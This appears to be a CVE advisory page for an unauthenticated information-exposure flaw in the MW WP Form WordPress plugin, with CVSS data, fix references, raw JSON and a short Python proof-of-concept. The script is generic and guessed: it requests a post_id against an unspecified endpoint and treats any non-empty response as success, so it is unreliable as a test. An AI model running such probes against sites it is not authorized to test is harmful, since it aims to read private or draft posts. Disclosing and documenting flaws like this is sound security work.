Security Vulnerability Report

CVE-2026-6206

Published: 2026-05-14 09:16:27
Last Modified: 2026-05-14 14:28:41

Description

The MW WP Form plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 5.1.2 via the _get_post_property_from_querystring() function due to insufficient restrictions on which posts can be included. This makes it possible for unauthenticated attackers to extract data from password protected, private, or draft posts that they should not have access to.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

MW WP Form <= 5.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-6206
# This script demonstrates how to exploit the information disclosure vulnerability.
import requests


def check_vulnerability(target_url, post_id):
    """
    Attempts to retrieve data from a private/draft post using the vulnerable function.
    """
    # The vulnerable endpoint might vary; this assumes the function is triggered via query params.
    # Adjust the endpoint path based on the specific plugin implementation.
    params = {
        'post_id': post_id,
        # Other parameters might be needed to reach the vulnerable code path
    }
    try:
        # Sending a GET request without authentication
        response = requests.get(target_url, params=params, timeout=10)
        # Check if the response contains content that should be hidden
        if response.status_code == 200 and len(response.text) > 0:
            print(f"[+] Potential data found for Post ID {post_id}:")
            print(response.text[:200])  # Print first 200 chars
            return True
        else:
            print(f"[-] No data exposed for Post ID {post_id}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Error connecting to target: {e}")
        return False


# Example Usage
# target = "http://example.com/"
# private_post_id = "123"
# check_vulnerability(target, private_post_id)

References

Weakness: CWE-639 (Authorization Bypass Through User-Controlled Key)

- https://github.com/web-soudan/mw-wp-form/commit/77aed98f56fdddc19bddf21c8f12faa5086d9202 (commit in the web-soudan/mw-wp-form GitHub repository)
- https://plugins.trac.wordpress.org/changeset/3516013/mw-wp-form (WordPress.org plugin changeset)
- https://www.wordfence.com/threat-intel/vulnerabilities/id/7f2c39f6-3d37-4765-99e8-023610856b61?source=cve (Wordfence Threat Intelligence entry)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-6206",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-14T09:16:27.497",
    "lastModified": "2026-05-14T14:28:41.283",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The MW WP Form plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 5.1.2 via the _get_post_property_from_querystring() function due to insufficient restrictions on which posts can be included. This makes it possible for unauthenticated attackers to extract data from password protected, private, or draft posts that they should not have access to."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-639"}
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/web-soudan/mw-wp-form/commit/77aed98f56fdddc19bddf21c8f12faa5086d9202", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/changeset/3516013/mw-wp-form", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7f2c39f6-3d37-4765-99e8-023610856b61?source=cve", "source": "[email protected]"}
    ]
  }
}